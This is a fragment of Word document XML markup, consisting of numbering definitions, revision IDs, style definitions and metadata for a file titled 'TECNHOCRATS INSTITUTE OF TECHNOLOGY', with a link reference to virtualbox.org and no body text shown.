    <w:tmpl w:val="1626E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BA2F58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13F2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C721AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1CC3568"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="144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num w:numId="1">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="19"/>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EFF"/>
    <w:rsid w:val="0002005E"/>
    <w:rsid w:val="00023073"/>
    <w:rsid w:val="000308D9"/>
    <w:rsid w:val="00031D8B"/>
    <w:rsid w:val="00032459"/>
    <w:rsid w:val="00062B6C"/>
    <w:rsid w:val="000A0FBF"/>
    <w:rsid w:val="000B66D1"/>
    <w:rsid w:val="000C5D88"/>
    <w:rsid w:val="000F2F25"/>
    <w:rsid w:val="000F4E89"/>
    <w:rsid w:val="001123B3"/>
    <w:rsid w:val="0014575B"/>
    <w:rsid w:val="0015486A"/>
    <w:rsid w:val="00155642"/>
    <w:rsid w:val="00166882"/>
    <w:rsid w:val="00173879"/>
    <w:rsid w:val="00174D23"/>
    <w:rsid w:val="00194EE9"/>
    <w:rsid w:val="001967AA"/>
    <w:rsid w:val="001B76E6"/>
    <w:rsid w:val="001C3B24"/>
    <w:rsid w:val="001F569E"/>
    <w:rsid w:val="00200537"/>
    <w:rsid w:val="002202CB"/>
    <w:rsid w:val="00243147"/>
    <w:rsid w:val="002431E8"/>
    <w:rsid w:val="002B4107"/>
    <w:rsid w:val="002B5238"/>
    <w:rsid w:val="002B7663"/>
    <w:rsid w:val="002C1DB7"/>
    <w:rsid w:val="003041A2"/>
    <w:rsid w:val="003216E0"/>
    <w:rsid w:val="00321ADD"/>
    <w:rsid w:val="003B7EFF"/>
    <w:rsid w:val="003E62A2"/>
    <w:rsid w:val="00406B7A"/>
    <w:rsid w:val="00463933"/>
    <w:rsid w:val="004867D2"/>
    <w:rsid w:val="004A2C12"/>
    <w:rsid w:val="004A77BF"/>
    <w:rsid w:val="004B2C8D"/>
    <w:rsid w:val="004B345A"/>
    <w:rsid w:val="004B60B4"/>
    <w:rsid w:val="004F3DD9"/>
    <w:rsid w:val="0051725F"/>
    <w:rsid w:val="0052766F"/>
    <w:rsid w:val="00556266"/>
    <w:rsid w:val="005708F3"/>
    <w:rsid w:val="00580F0D"/>
    <w:rsid w:val="005A3471"/>
    <w:rsid w:val="005B6664"/>
    <w:rsid w:val="005C45A6"/>
    <w:rsid w:val="00610106"/>
    <w:rsid w:val="00611404"/>
    <w:rsid w:val="00675EB9"/>
    <w:rsid w:val="00690399"/>
    <w:rsid w:val="00691374"/>
    <w:rsid w:val="006B200B"/>
    <w:rsid w:val="006C314F"/>
    <w:rsid w:val="006D5BFE"/>
    <w:rsid w:val="006E3C8A"/>
    <w:rsid w:val="006F2646"/>
    <w:rsid w:val="00706EB7"/>
    <w:rsid w:val="00716394"/>
    <w:rsid w:val="00716AFF"/>
    <w:rsid w:val="00725829"/>
    <w:rsid w:val="00751F50"/>
    <w:rsid w:val="00786FC7"/>
    <w:rsid w:val="007B3D60"/>
    <w:rsid w:val="007E37D1"/>
    <w:rsid w:val="0083099E"/>
    <w:rsid w:val="00843DF0"/>
    <w:rsid w:val="00890178"/>
    <w:rsid w:val="008978CF"/>
    <w:rsid w:val="008A00E0"/>
    <w:rsid w:val="008D06ED"/>
    <w:rsid w:val="008F2D69"/>
    <w:rsid w:val="00904820"/>
    <w:rsid w:val="00915619"/>
    <w:rsid w:val="0092611A"/>
    <w:rsid w:val="009305D1"/>
    <w:rsid w:val="00942CC1"/>
    <w:rsid w:val="00942D51"/>
    <w:rsid w:val="0096295F"/>
    <w:rsid w:val="00964EF2"/>
    <w:rsid w:val="009D7D1B"/>
    <w:rsid w:val="009E22F0"/>
    <w:rsid w:val="009E3EA3"/>
    <w:rsid w:val="009F2700"/>
    <w:rsid w:val="009F7B98"/>
    <w:rsid w:val="00A11325"/>
    <w:rsid w:val="00A11473"/>
    <w:rsid w:val="00A343A3"/>
    <w:rsid w:val="00A5255D"/>
    <w:rsid w:val="00A670C4"/>
    <w:rsid w:val="00A727F9"/>
    <w:rsid w:val="00A74538"/>
    <w:rsid w:val="00A851B1"/>
    <w:rsid w:val="00A8573A"/>
    <w:rsid w:val="00A9440F"/>
    <w:rsid w:val="00AC47E5"/>
    <w:rsid w:val="00AD4082"/>
    <w:rsid w:val="00AE324F"/>
    <w:rsid w:val="00AE6EB9"/>
    <w:rsid w:val="00B13DB1"/>
    <w:rsid w:val="00B16922"/>
    <w:rsid w:val="00B865E0"/>
    <w:rsid w:val="00B923CE"/>
    <w:rsid w:val="00BA57BA"/>
    <w:rsid w:val="00BB25BF"/>
    <w:rsid w:val="00BC396B"/>
    <w:rsid w:val="00BC45B0"/>
    <w:rsid w:val="00BD19AC"/>
    <w:rsid w:val="00BD3A56"/>
    <w:rsid w:val="00BF5CE9"/>
    <w:rsid w:val="00C134C6"/>
    <w:rsid w:val="00C2269B"/>
    <w:rsid w:val="00C31DE4"/>
    <w:rsid w:val="00C54AED"/>
    <w:rsid w:val="00C82ED1"/>
    <w:rsid w:val="00C84F2C"/>
    <w:rsid w:val="00C921FA"/>
    <w:rsid w:val="00CE2F63"/>
    <w:rsid w:val="00CE3C03"/>
    <w:rsid w:val="00CF2964"/>
    <w:rsid w:val="00D00724"/>
    <w:rsid w:val="00D0326C"/>
    <w:rsid w:val="00D37451"/>
    <w:rsid w:val="00D43A18"/>
    <w:rsid w:val="00D50478"/>
    <w:rsid w:val="00D55DE4"/>
    <w:rsid w:val="00D60F50"/>
    <w:rsid w:val="00D875A0"/>
    <w:rsid w:val="00DA003D"/>
    <w:rsid w:val="00DC0CDD"/>
    <w:rsid w:val="00E27BBC"/>
    <w:rsid w:val="00E44C72"/>
    <w:rsid w:val="00E45EB3"/>
    <w:rsid w:val="00E73650"/>
    <w:rsid w:val="00E83055"/>
    <w:rsid w:val="00E8513F"/>
    <w:rsid w:val="00EA6395"/>
    <w:rsid w:val="00EC29A0"/>
    <w:rsid w:val="00EE3A21"/>
    <w:rsid w:val="00EF6A49"/>
    <w:rsid w:val="00F1388D"/>
    <w:rsid w:val="00F16BD9"/>
    <w:rsid w:val="00F45D2C"/>
    <w:rsid w:val="00F50DF5"/>
    <w:rsid w:val="00F67828"/>
    <w:rsid w:val="00F85955"/>
    <w:rsid w:val="00FB2EB2"/>
    <w:rsid w:val="00FB5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3D946C5-0809-48E9-9F22-30CE8213A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922"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B16922"/>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16922"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B16922"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:qFormat/>
    <w:rsid w:val="00B16922"/>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B16922"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:link w:val="Heading7"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00B16922"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B16922"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B16922"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalArial">
    <w:name w:val="Normal + Arial"/>
    <w:aliases w:val="18 pt,Black"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B16922"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalBookmanOldStyle">
    <w:name w:val="Normal + Bookman Old Style"/>
    <w:aliases w:val="16 pt"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B16922"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="1426"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-style-span">
    <w:name w:val="apple-style-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004867D2"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00786FC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Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="002C1DB7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable5Dark-Accent5">
    <w:name w:val="Grid Table 5 Dark Accent 5"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00A1132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A1132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A11325"/>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C82ED1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00725829"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00725829"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00725829"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00725829"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008F2D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9609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virtualbox.org"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87DC02DE-03E5-4C6C-B55B-4EE02737C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3142</Words>
  <Characters>17912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TECNHOCRATS INSTITUTE OF TECHNOLOGY</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21012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TECNHOCRATS INSTITUTE OF TECHNOLOGY</dc:title>
  <dc:subject/>
  <dc:creator>pha</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-07-11T11:38:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-11T11:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-11T11:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>